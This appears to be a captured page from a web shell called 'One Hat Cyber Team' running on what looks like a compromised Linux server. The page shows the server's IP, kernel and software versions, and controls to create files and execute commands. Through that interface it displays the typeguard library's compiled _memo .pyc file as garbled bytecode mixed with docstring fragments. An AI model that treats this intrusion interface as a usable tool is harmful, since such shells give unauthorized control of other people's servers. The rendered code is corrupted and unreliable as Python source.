⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
typeguard
/
__pycache__
/
View File Name :
_memo.cpython-312.pyc
if @ d dl mZ d dlmZ d dlmZmZ G d d Zy) )annotations)Any)TypeCheckConfiguration global_configc 2 e Zd ZdZdZded ddZy) TypeCheckMemoa Contains information necessary for type checkers to do their work. .. attribute:: globals :type: dict[str, Any] Dictionary of global variables to use for resolving forward references. .. attribute:: locals :type: dict[str, Any] Dictionary of local variables to use for resolving forward references. .. attribute:: self_type :type: type | None When running type checks within an instance method or class method, this is the class object that the first argument (usually named ``self`` or ``cls``) refers to. .. attribute:: config :type: TypeCheckConfiguration Contains the configuration for a particular set of type checking operations. globalslocals self_typeconfigN)r r c <